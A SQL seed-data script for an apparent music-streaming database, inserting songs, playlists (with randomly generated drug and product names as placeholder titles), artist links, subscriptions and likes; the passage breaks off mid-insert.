insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('<NAME>', 5, 8, '1:46', 'Vivamus.txt', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Trust Me', 5, 9, '3:15', 'OdioElementum.ppt', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Get It While You Can', 5, 10, '3:23', 'Odio.png', 'Blues rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Break On Through (To the Other Side)', 13, 1, '2:25', 'AmetEleifendPede.ppt', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Soul Kitchen', 13, 2, '3:30', 'UtTellus.avi', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('The Crystal Ship', 13, 3, '2:30', 'MaurisVulputate.xls', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Twentieth Cent<NAME>', 13, 4, '2:30', 'IdTurpis.mp3', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Alabama Song (Whisky Bar)', 13, 5, '3:15', 'VestibulumQuam.mp3', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Light My Fire', 13, 6, '6:50', 'PorttitorLoremId.mp3', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Back Door Man', 13, 7, '3:30', 'ArcuAdipiscing.avi', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('I Looked at You', 13, 8, '2:18', 'IdMauris.tiff', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('End of the Night', 13, 9, '2:49', 'AtFeugiat.tiff', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('Take It as It Comes', 13, 10, '2:13', 'Vel.mp3', 'Rock');
insert into songs (songname, album_id, songnumberonalbum, songduration, songfile, genre) values ('The End', 13, 11, '11:35', 'Pede.avi', 'Rock');
-- Seed data: playlists. Names/descriptions are random generator output
-- (drug and product names) and the coverimage URLs are dummyimage.com
-- placeholders. created_by runs 1..30 — presumably user ids; verify a
-- users table with those ids exists before loading.
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Reed Therapeutics Pain Relieving Therapy', 'http://dummyimage.com/166x196.png/ff4444/ffffff', 'Reed Therapeutics', 1, '2020-11-20 11:39:42');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('<NAME>', 'http://dummyimage.com/161x115.jpg/ff4444/ffffff', 'Citron Pharma LLC', 2, '2020-04-29 21:38:43');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Lidocaine Hydrochloride', 'http://dummyimage.com/198x171.png/dddddd/000000', 'Hospira, Inc.', 3, '2020-08-07 13:16:31');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Firebush/Burning Bush', 'http://dummyimage.com/114x148.jpg/dddddd/000000', 'Nelco Laboratories, Inc.', 4, '2020-08-28 01:03:32');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Amitriptyline Hydrochloride', 'http://dummyimage.com/181x219.png/5fa2dd/ffffff', 'Aidarex Pharmaceuticals LLC', 5, '2020-04-20 21:57:53');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Metoprolol Tartrate', 'http://dummyimage.com/143x247.png/ff4444/ffffff', 'Mylan Institutional Inc.', 6, '2020-11-04 08:36:42');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Lodosyn', 'http://dummyimage.com/214x225.bmp/dddddd/000000', 'Aton Pharma, Inc', 7, '2020-04-22 03:35:18');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Fluorouracil', 'http://dummyimage.com/120x111.jpg/5fa2dd/ffffff', 'Oceanside Pharmaceuticals', 8, '2020-09-24 10:37:34');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Adempas', 'http://dummyimage.com/131x113.bmp/dddddd/000000', 'Bayer HealthCare Pharmaceuticals Inc.', 9, '2020-01-11 13:13:48');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('<NAME>', 'http://dummyimage.com/101x126.jpg/ff4444/ffffff', 'Reckitt Benckiser LLC', 10, '2020-05-09 06:05:28');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('OxyContin', 'http://dummyimage.com/154x153.jpg/ff4444/ffffff', 'Bryant Ranch Prepack', 11, '2020-02-07 08:32:57');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('California Mugwort', 'http://dummyimage.com/232x175.png/cc0000/ffffff', 'Nelco Laboratories, Inc.', 12, '2020-10-02 02:27:59');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('<NAME>', 'http://dummyimage.com/234x163.png/dddddd/000000', 'Natural Creations, Inc.', 13, '2020-03-16 02:24:48');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('<NAME>', 'http://dummyimage.com/250x120.bmp/5fa2dd/ffffff', 'REMEDYREPACK INC.', 14, '2020-04-12 21:14:20');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('MINERALIZE', 'http://dummyimage.com/245x162.bmp/5fa2dd/ffffff', 'MAKEUP ART COSMETICS', 15, '2020-05-15 08:32:00');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Codfish', 'http://dummyimage.com/170x229.png/cc0000/ffffff', 'Nelco Laboratories, Inc.', 16, '2020-12-14 13:07:39');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('<NAME>', 'http://dummyimage.com/199x208.jpg/cc0000/ffffff', 'Mylan Pharmaceuticals Inc.', 17, '2019-12-22 12:15:38');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('H E B', 'http://dummyimage.com/184x176.png/ff4444/ffffff', 'HEB', 18, '2020-10-20 04:32:25');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Bupropion Hydrochloride', 'http://dummyimage.com/221x167.jpg/cc0000/ffffff', 'Dispensing Solutions, Inc.', 19, '2020-04-12 15:35:33');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Donepezil Hydrochloride', 'http://dummyimage.com/181x119.jpg/cc0000/ffffff', 'Aurobindo Pharma Limited', 20, '2020-02-26 13:48:49');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('FAMCICLOVIR', 'http://dummyimage.com/125x192.png/dddddd/000000', 'Apotex Corp.', 21, '2020-03-05 14:02:59');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Simvastatin', 'http://dummyimage.com/231x225.bmp/5fa2dd/ffffff', 'McKesson Contract Packaging', 22, '2020-04-12 21:50:48');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('<NAME>', 'http://dummyimage.com/155x204.bmp/cc0000/ffffff', '<NAME>', 23, '2020-11-30 08:43:11');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Degree', 'http://dummyimage.com/220x180.png/ff4444/ffffff', 'Conopco Inc. d/b/a Unilever', 24, '2020-07-12 18:38:27');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Penicillium Mixture', 'http://dummyimage.com/166x219.png/dddddd/000000', 'Antigen Laboratories, Inc.', 25, '2020-10-05 04:52:35');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('RITUALS broad spectrum SPF 15 sunscreen matt', 'http://dummyimage.com/152x204.jpg/dddddd/000000', 'Rituals Cosmetics USA, Inc.', 26, '2020-06-26 17:02:38');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Cilostazol', 'http://dummyimage.com/212x185.png/ff4444/ffffff', 'Golden State Medical Supply, Inc.', 27, '2020-07-17 23:45:19');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Bekunis Natures Gentle Laxative Instant Tea', 'http://dummyimage.com/223x133.bmp/cc0000/ffffff', 'roha arzneimittel GmbH', 28, '2020-10-24 08:19:55');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Simcor', 'http://dummyimage.com/150x244.bmp/cc0000/ffffff', 'AbbVie Inc.', 29, '2020-06-25 14:31:33');
insert into playlists (playlistname, coverimage, description, created_by, created_at) values ('Lidocaine Hydrochloride and Hydrocortisone Acetate', 'http://dummyimage.com/130x211.bmp/dddddd/000000', 'Seton Pharmaceuticals', 30, '2020-06-20 13:51:47');
-- Link table: which artist made which album (album_id -> artist_id),
-- written as a single multi-row insert (same pairs, same order).
insert into artistsandalbums (album_id, artist_id) values
    (1, 27),
    (2, 27),
    (3, 28),
    (4, 28),
    (5, 29),
    (6, 30),
    (7, 32),
    (8, 33),
    (9, 36),
    (10, 36),
    (11, 39),
    (12, 37),
    (13, 26),
    (14, 26),
    (15, 26),
    (16, 26),
    (17, 37);
insert into songperformers (song_id, artist_id) values (1, 27);
insert into songperformers (song_id, artist_id) values (2, 27);
insert into songperformers (song_id, artist_id) values (3, 27);
insert into songperformers (song_id, artist_id) values (4, 27);
insert into songperformers (song_id, artist_id) values (5, 27);
insert into songperformers (song_id, artist_id) values (6, 27);
insert into songperformers (song_id, artist_id) values (7, 27);
insert into songperformers (song_id, artist_id) values (8, 27);
insert into songperformers (song_id, artist_id) values (9, 27);
insert into songperformers (song_id, artist_id) values (10, 27);
insert into songperformers (song_id, artist_id) values (11, 27);
insert into songperformers (song_id, artist_id) values (12, 27);
insert into songperformers (song_id, artist_id) values (13, 36);
insert into songperformers (song_id, artist_id) values (14, 36);
insert into songperformers (song_id, artist_id) values (15, 36);
insert into songperformers (song_id, artist_id) values (16, 36);
insert into songperformers (song_id, artist_id) values (17, 36);
insert into songperformers (song_id, artist_id) values (18, 36);
insert into songperformers (song_id, artist_id) values (19, 36);
insert into songperformers (song_id, artist_id) values (20, 36);
insert into songperformers (song_id, artist_id) values (21, 36);
insert into songperformers (song_id, artist_id) values (22, 36);
insert into songperformers (song_id, artist_id) values (23, 36);
insert into songperformers (song_id, artist_id) values (24, 28);
insert into songperformers (song_id, artist_id) values (25, 28);
insert into songperformers (song_id, artist_id) values (26, 28);
insert into songperformers (song_id, artist_id) values (27, 28);
insert into songperformers (song_id, artist_id) values (28, 28);
insert into songperformers (song_id, artist_id) values (29, 28);
insert into songperformers (song_id, artist_id) values (30, 28);
insert into songperformers (song_id, artist_id) values (31, 28);
insert into songperformers (song_id, artist_id) values (32, 28);
insert into songperformers (song_id, artist_id) values (33, 28);
insert into songperformers (song_id, artist_id) values (34, 28);
insert into songperformers (song_id, artist_id) values (35, 30);
insert into songperformers (song_id, artist_id) values (36, 30);
insert into songperformers (song_id, artist_id) values (37, 30);
insert into songperformers (song_id, artist_id) values (38, 30);
insert into songperformers (song_id, artist_id) values (39, 30);
insert into songperformers (song_id, artist_id) values (40, 30);
insert into songperformers (song_id, artist_id) values (41, 30);
insert into songperformers (song_id, artist_id) values (42, 30);
insert into songperformers (song_id, artist_id) values (43, 30);
insert into songperformers (song_id, artist_id) values (44, 30);
insert into songperformers (song_id, artist_id) values (45, 29);
insert into songperformers (song_id, artist_id) values (46, 29);
insert into songperformers (song_id, artist_id) values (47, 29);
insert into songperformers (song_id, artist_id) values (48, 29);
insert into songperformers (song_id, artist_id) values (49, 29);
insert into songperformers (song_id, artist_id) values (50, 29);
insert into songperformers (song_id, artist_id) values (51, 29);
insert into songperformers (song_id, artist_id) values (52, 29);
insert into songperformers (song_id, artist_id) values (53, 29);
insert into songperformers (song_id, artist_id) values (54, 29);
insert into songperformers (song_id, artist_id) values (55, 26);
insert into songperformers (song_id, artist_id) values (56, 26);
insert into songperformers (song_id, artist_id) values (57, 26);
insert into songperformers (song_id, artist_id) values (58, 26);
insert into songperformers (song_id, artist_id) values (59, 26);
insert into songperformers (song_id, artist_id) values (60, 26);
insert into songperformers (song_id, artist_id) values (61, 26);
insert into songperformers (song_id, artist_id) values (62, 26);
insert into songperformers (song_id, artist_id) values (63, 26);
insert into songperformers (song_id, artist_id) values (64, 26);
insert into songperformers (song_id, artist_id) values (65, 26);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(39,1,1),
(44,1,4),
(38,1,5),
(8,1,2),
(47,1,6),
(9,1,3),
(45,2,1),
(55,2,2),
(5,2,3),
(28,2,4);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(13,2,5),
(11,3,1),
(21,3,2),
(27,3,3),
(62,5,5),
(29,5,4),
(13,5,6),
(9,5,7),
(35,6,1),
(30,6,2);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(12,7,2),
(55,7,1),
(27,8,5),
(19,8,4),
(9,8,2),
(33,8,3),
(7,8,1),
(14,9,1),
(48,9,2),
(44,10,1);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(11,10,2),
(47,10,4),
(56,10,3),
(55,11,1),
(26,11,2),
(25,11,3),
(12,12,2),
(9,12,1),
(41,12,4),
(59,12,5);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(39,12,3),
(38,13,3),
(1,13,2),
(32,13,4),
(39,13,1),
(45,13,5),
(33,13,6),
(32,14,2),
(51,14,3),
(63,14,1);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(26,15,1),
(34,15,2),
(18,15,3),
(58,15,4),
(58,16,1),
(35,16,2),
(5,17,2),
(4,17,1),
(15,17,3),
(4,18,2);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(17,18,1),
(24,18,3),
(60,18,4),
(12,18,5),
(7,19,1),
(39,19,2),
(8,20,2),
(12,20,3),
(63,20,1),
(44,21,2);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(24,21,1),
(11,22,1),
(43,23,4),
(32,23,1),
(52,23,3),
(63,23,2),
(59,23,5),
(29,24,2),
(3,24,1),
(32,25,2);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(14,25,4),
(49,25,3),
(42,25,1),
(24,26,1),
(57,26,2),
(44,27,3),
(27,27,1),
(13,27,2),
(40,27,4),
(10,28,1);
insert into music1.songsonplaylists (song_id,playlist_id,songnumberonplaylist) values
(16,29,1),
(49,29,2),
(8,29,3),
(4,29,5),
(41,29,4),
(37,30,3),
(55,30,2),
(2,30,4),
(44,30,1);
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(5,22,'1','2020-12-26 04:27:34.0'),
(20,20,'1','2020-12-26 04:27:33.0'),
(24,36,'1','2020-12-26 04:27:34.0'),
(26,14,'1','2020-12-26 04:27:34.0'),
(31,3,'1','2020-12-26 04:27:34.0'),
(32,14,'1','2020-12-26 04:27:34.0'),
(33,15,'1','2020-12-26 04:27:34.0'),
(38,6,'1','2020-12-26 04:27:34.0'),
(40,35,'1','2020-12-26 04:27:34.0'),
(47,2,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(52,37,'1','2020-12-26 04:27:33.0'),
(54,18,'1','2020-12-26 04:27:33.0'),
(61,18,'1','2020-12-26 04:27:34.0'),
(64,5,'1','2020-12-26 04:27:34.0'),
(66,37,'1','2020-12-26 04:27:34.0'),
(74,36,'1','2020-12-26 04:27:34.0'),
(74,12,'1','2020-12-26 04:27:34.0'),
(75,6,'1','2020-12-26 04:27:34.0'),
(81,16,'1','2020-12-26 04:27:34.0'),
(82,15,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(86,29,'1','2020-12-26 04:27:34.0'),
(90,31,'1','2020-12-26 04:27:34.0'),
(102,17,'1','2020-12-26 04:27:34.0'),
(102,15,'1','2020-12-26 04:27:34.0'),
(103,22,'1','2020-12-26 04:27:34.0'),
(107,28,'1','2020-12-26 04:27:34.0'),
(110,3,'1','2020-12-26 04:27:34.0'),
(114,8,'1','2020-12-26 04:27:33.0'),
(120,4,'1','2020-12-26 04:27:34.0'),
(122,3,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(131,16,'1','2020-12-26 04:27:34.0'),
(137,14,'1','2020-12-26 04:27:34.0'),
(142,34,'1','2020-12-26 04:27:34.0'),
(144,8,'1','2020-12-26 04:27:34.0'),
(149,18,'1','2020-12-26 04:27:34.0'),
(163,12,'1','2020-12-26 04:27:34.0'),
(165,24,'1','2020-12-26 04:27:34.0'),
(167,21,'0','2020-12-26 04:27:34.0'),
(167,11,'1','2020-12-26 04:27:34.0'),
(179,28,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(184,1,'1','2020-12-26 04:27:34.0'),
(188,38,'1','2020-12-26 04:27:34.0'),
(189,5,'1','2020-12-26 04:27:34.0'),
(191,39,'1','2020-12-26 04:27:34.0'),
(196,40,'1','2020-12-26 04:27:34.0'),
(199,38,'1','2020-12-26 04:27:33.0'),
(200,30,'1','2020-12-26 04:27:34.0'),
(200,34,'1','2020-12-26 04:27:34.0'),
(202,29,'1','2020-12-26 04:27:34.0'),
(210,16,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(213,31,'0','2020-12-26 04:27:34.0'),
(218,29,'0','2020-12-26 04:27:34.0'),
(227,6,'1','2020-12-26 04:27:34.0'),
(239,12,'1','2020-12-26 04:27:34.0'),
(250,10,'1','2020-12-26 04:27:34.0'),
(255,39,'1','2020-12-26 04:27:34.0'),
(263,24,'1','2020-12-26 04:27:33.0'),
(285,30,'1','2020-12-26 04:27:34.0'),
(287,30,'1','2020-12-26 04:27:34.0'),
(294,40,'0','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(296,13,'1','2020-12-26 04:27:34.0'),
(301,26,'1','2020-12-26 04:27:34.0'),
(314,14,'1','2020-12-26 04:27:34.0'),
(314,29,'1','2020-12-26 04:27:34.0'),
(319,13,'1','2020-12-26 04:27:34.0'),
(320,10,'1','2020-12-26 04:27:34.0'),
(325,22,'0','2020-12-26 04:27:34.0'),
(325,40,'0','2020-12-26 04:27:34.0'),
(327,36,'0','2020-12-26 04:27:34.0'),
(329,23,'1','2020-12-26 04:27:33.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(332,32,'1','2020-12-26 04:27:34.0'),
(337,34,'1','2020-12-26 04:27:34.0'),
(338,35,'1','2020-12-26 04:27:34.0'),
(342,40,'1','2020-12-26 04:27:34.0'),
(347,34,'1','2020-12-26 04:27:34.0'),
(350,9,'1','2020-12-26 04:27:34.0'),
(350,1,'1','2020-12-26 04:27:34.0'),
(351,14,'1','2020-12-26 04:27:34.0'),
(356,21,'1','2020-12-26 04:27:34.0'),
(357,10,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(365,28,'1','2020-12-26 04:27:34.0'),
(383,12,'1','2020-12-26 04:27:34.0'),
(399,5,'1','2020-12-26 04:27:33.0'),
(401,31,'1','2020-12-26 04:27:34.0'),
(415,40,'1','2020-12-26 04:27:34.0'),
(416,31,'1','2020-12-26 04:27:34.0'),
(417,31,'1','2020-12-26 04:27:34.0'),
(423,31,'1','2020-12-26 04:27:34.0'),
(431,8,'1','2020-12-26 04:27:34.0'),
(438,26,'1','2020-12-26 04:27:34.0');
insert into music1.subscribes (users_id,artist_id,subscribedornot,updated_at) values
(448,32,'1','2020-12-26 04:27:34.0'),
(460,8,'1','2020-12-26 04:27:34.0'),
(461,1,'1','2020-12-26 04:27:34.0'),
(473,26,'0','2020-12-26 04:27:34.0'),
(487,11,'0','2020-12-26 04:27:34.0'),
(489,19,'0','2020-12-26 04:27:34.0'),
(490,31,'1','2020-12-26 04:27:34.0'),
(493,36,'1','2020-12-26 04:27:34.0'),
(497,7,'1','2020-12-26 04:27:34.0'),
(499,38,'0','2020-12-26 04:27:34.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(1,16,'1','2020-12-26 05:38:24.0'),
(2,4,'1','2020-12-26 05:38:24.0'),
(3,14,'1','2020-12-26 05:38:24.0'),
(13,5,'1','2020-12-26 05:38:24.0'),
(19,1,'0','2020-12-26 05:38:24.0'),
(24,3,'1','2020-12-26 05:38:24.0'),
(37,12,'1','2020-12-26 05:38:24.0'),
(44,9,'1','2020-12-26 05:38:24.0'),
(50,7,'1','2020-12-26 05:38:24.0'),
(60,12,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(61,16,'1','2020-12-26 05:38:24.0'),
(63,15,'1','2020-12-26 05:38:24.0'),
(64,9,'1','2020-12-26 05:38:24.0'),
(67,10,'1','2020-12-26 05:38:24.0'),
(70,12,'1','2020-12-26 05:38:24.0'),
(72,14,'1','2020-12-26 05:38:24.0'),
(77,1,'0','2020-12-26 05:38:24.0'),
(85,7,'1','2020-12-26 05:38:24.0'),
(86,11,'1','2020-12-26 05:38:24.0'),
(93,4,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(104,8,'1','2020-12-26 05:38:24.0'),
(105,3,'1','2020-12-26 05:38:24.0'),
(116,7,'1','2020-12-26 05:38:24.0'),
(118,6,'1','2020-12-26 05:38:24.0'),
(123,14,'1','2020-12-26 05:38:24.0'),
(131,3,'0','2020-12-26 05:38:24.0'),
(132,3,'1','2020-12-26 05:38:24.0'),
(134,14,'1','2020-12-26 05:38:24.0'),
(145,15,'0','2020-12-26 05:38:24.0'),
(152,15,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(153,8,'1','2020-12-26 05:38:24.0'),
(155,3,'1','2020-12-26 05:38:24.0'),
(156,7,'1','2020-12-26 05:38:24.0'),
(161,11,'1','2020-12-26 05:38:24.0'),
(163,13,'1','2020-12-26 05:38:24.0'),
(168,13,'1','2020-12-26 05:38:24.0'),
(170,3,'0','2020-12-26 05:38:24.0'),
(185,8,'1','2020-12-26 05:38:24.0'),
(187,5,'1','2020-12-26 05:38:24.0'),
(187,6,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(191,15,'1','2020-12-26 05:38:24.0'),
(194,5,'1','2020-12-26 05:38:24.0'),
(201,3,'1','2020-12-26 05:38:24.0'),
(206,5,'1','2020-12-26 05:38:24.0'),
(211,11,'0','2020-12-26 05:38:24.0'),
(211,17,'1','2020-12-26 05:38:24.0'),
(221,13,'1','2020-12-26 05:38:24.0'),
(226,11,'1','2020-12-26 05:38:24.0'),
(230,8,'1','2020-12-26 05:38:24.0'),
(235,6,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(246,17,'1','2020-12-26 05:38:24.0'),
(250,6,'1','2020-12-26 05:38:24.0'),
(251,16,'1','2020-12-26 05:38:24.0'),
(254,10,'1','2020-12-26 05:38:24.0'),
(255,14,'1','2020-12-26 05:38:24.0'),
(260,15,'1','2020-12-26 05:38:24.0'),
(262,8,'1','2020-12-26 05:38:24.0'),
(269,12,'0','2020-12-26 05:38:24.0'),
(270,9,'1','2020-12-26 05:38:24.0'),
(271,3,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(276,16,'1','2020-12-26 05:38:24.0'),
(277,15,'1','2020-12-26 05:38:24.0'),
(282,13,'0','2020-12-26 05:38:24.0'),
(283,4,'1','2020-12-26 05:38:24.0'),
(284,1,'1','2020-12-26 05:38:24.0'),
(291,16,'1','2020-12-26 05:38:24.0'),
(303,1,'1','2020-12-26 05:38:24.0'),
(309,8,'1','2020-12-26 05:38:24.0'),
(317,3,'1','2020-12-26 05:38:24.0'),
(320,13,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(333,1,'1','2020-12-26 05:38:24.0'),
(338,15,'1','2020-12-26 05:38:24.0'),
(342,5,'1','2020-12-26 05:38:24.0'),
(346,6,'1','2020-12-26 05:38:24.0'),
(350,15,'1','2020-12-26 05:38:24.0'),
(352,11,'1','2020-12-26 05:38:24.0'),
(353,15,'1','2020-12-26 05:38:24.0'),
(354,15,'0','2020-12-26 05:38:24.0'),
(382,15,'1','2020-12-26 05:38:24.0'),
(390,16,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(390,7,'0','2020-12-26 05:38:24.0'),
(397,5,'1','2020-12-26 05:38:24.0'),
(404,3,'1','2020-12-26 05:38:24.0'),
(406,14,'1','2020-12-26 05:38:24.0'),
(407,6,'1','2020-12-26 05:38:24.0'),
(407,7,'1','2020-12-26 05:38:24.0'),
(411,7,'1','2020-12-26 05:38:24.0'),
(413,6,'1','2020-12-26 05:38:24.0'),
(425,9,'0','2020-12-26 05:38:24.0'),
(427,7,'1','2020-12-26 05:38:24.0');
insert into music1.likedalbums (users_id,album_id,likedornot,updated_at) values
(437,11,'1','2020-12-26 05:38:24.0'),
(445,15,'0','2020-12-26 05:38:24.0'),
(450,8,'1','2020-12-26 05:38:24.0'),
(457,10,'1','2020-12-26 05:38:24.0'),
(464,6,'0','2020-12-26 05:38:24.0'),
(467,11,'1','2020-12-26 05:38:24.0'),
(474,6,'1','2020-12-26 05:38:24.0'),
(484,8,'1','2020-12-26 05:38:24.0'),
(490,4,'1','2020-12-26 05:38:24.0'),
(500,6,'1','2020-12-26 05:38:24.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(2,15,'1','2020-12-26 05:38:13.0'),
(6,26,'1','2020-12-26 05:38:13.0'),
(18,5,'1','2020-12-26 05:38:13.0'),
(20,26,'1','2020-12-26 05:38:12.0'),
(21,19,'1','2020-12-26 05:38:13.0'),
(31,11,'1','2020-12-26 05:38:13.0'),
(34,22,'1','2020-12-26 05:38:12.0'),
(37,21,'1','2020-12-26 05:38:13.0'),
(41,8,'1','2020-12-26 05:38:13.0'),
(46,24,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(52,21,'1','2020-12-26 05:38:13.0'),
(55,9,'1','2020-12-26 05:38:12.0'),
(57,16,'1','2020-12-26 05:38:13.0'),
(60,9,'1','2020-12-26 05:38:13.0'),
(61,4,'1','2020-12-26 05:38:13.0'),
(67,1,'1','2020-12-26 05:38:13.0'),
(78,26,'1','2020-12-26 05:38:13.0'),
(84,24,'1','2020-12-26 05:38:13.0'),
(90,19,'1','2020-12-26 05:38:12.0'),
(103,12,'0','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(106,9,'1','2020-12-26 05:38:13.0'),
(122,6,'1','2020-12-26 05:38:13.0'),
(124,28,'1','2020-12-26 05:38:13.0'),
(125,4,'1','2020-12-26 05:38:13.0'),
(135,7,'1','2020-12-26 05:38:13.0'),
(138,24,'1','2020-12-26 05:38:13.0'),
(140,15,'1','2020-12-26 05:38:13.0'),
(143,20,'1','2020-12-26 05:38:13.0'),
(145,9,'1','2020-12-26 05:38:13.0'),
(150,15,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(151,30,'1','2020-12-26 05:38:13.0'),
(152,6,'0','2020-12-26 05:38:13.0'),
(162,10,'1','2020-12-26 05:38:13.0'),
(164,15,'1','2020-12-26 05:38:13.0'),
(171,29,'1','2020-12-26 05:38:13.0'),
(183,14,'1','2020-12-26 05:38:13.0'),
(184,15,'1','2020-12-26 05:38:13.0'),
(191,27,'1','2020-12-26 05:38:13.0'),
(204,11,'1','2020-12-26 05:38:13.0'),
(204,30,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(205,2,'0','2020-12-26 05:38:13.0'),
(205,22,'0','2020-12-26 05:38:13.0'),
(207,18,'1','2020-12-26 05:38:13.0'),
(207,26,'1','2020-12-26 05:38:13.0'),
(212,26,'1','2020-12-26 05:38:12.0'),
(223,28,'1','2020-12-26 05:38:12.0'),
(227,16,'0','2020-12-26 05:38:13.0'),
(230,5,'1','2020-12-26 05:38:13.0'),
(231,1,'1','2020-12-26 05:38:13.0'),
(236,24,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(236,23,'1','2020-12-26 05:38:13.0'),
(242,10,'1','2020-12-26 05:38:13.0'),
(242,22,'1','2020-12-26 05:38:13.0'),
(250,2,'1','2020-12-26 05:38:13.0'),
(251,12,'1','2020-12-26 05:38:12.0'),
(256,16,'1','2020-12-26 05:38:13.0'),
(256,6,'1','2020-12-26 05:38:12.0'),
(290,20,'1','2020-12-26 05:38:13.0'),
(295,8,'1','2020-12-26 05:38:13.0'),
(297,28,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(306,23,'1','2020-12-26 05:38:13.0'),
(309,13,'1','2020-12-26 05:38:13.0'),
(313,26,'1','2020-12-26 05:38:13.0'),
(319,25,'1','2020-12-26 05:38:13.0'),
(331,30,'1','2020-12-26 05:38:13.0'),
(331,20,'1','2020-12-26 05:38:13.0'),
(335,20,'1','2020-12-26 05:38:13.0'),
(336,27,'0','2020-12-26 05:38:13.0'),
(344,16,'1','2020-12-26 05:38:12.0'),
(350,22,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(356,30,'1','2020-12-26 05:38:13.0'),
(371,28,'1','2020-12-26 05:38:12.0'),
(374,5,'1','2020-12-26 05:38:13.0'),
(378,20,'1','2020-12-26 05:38:13.0'),
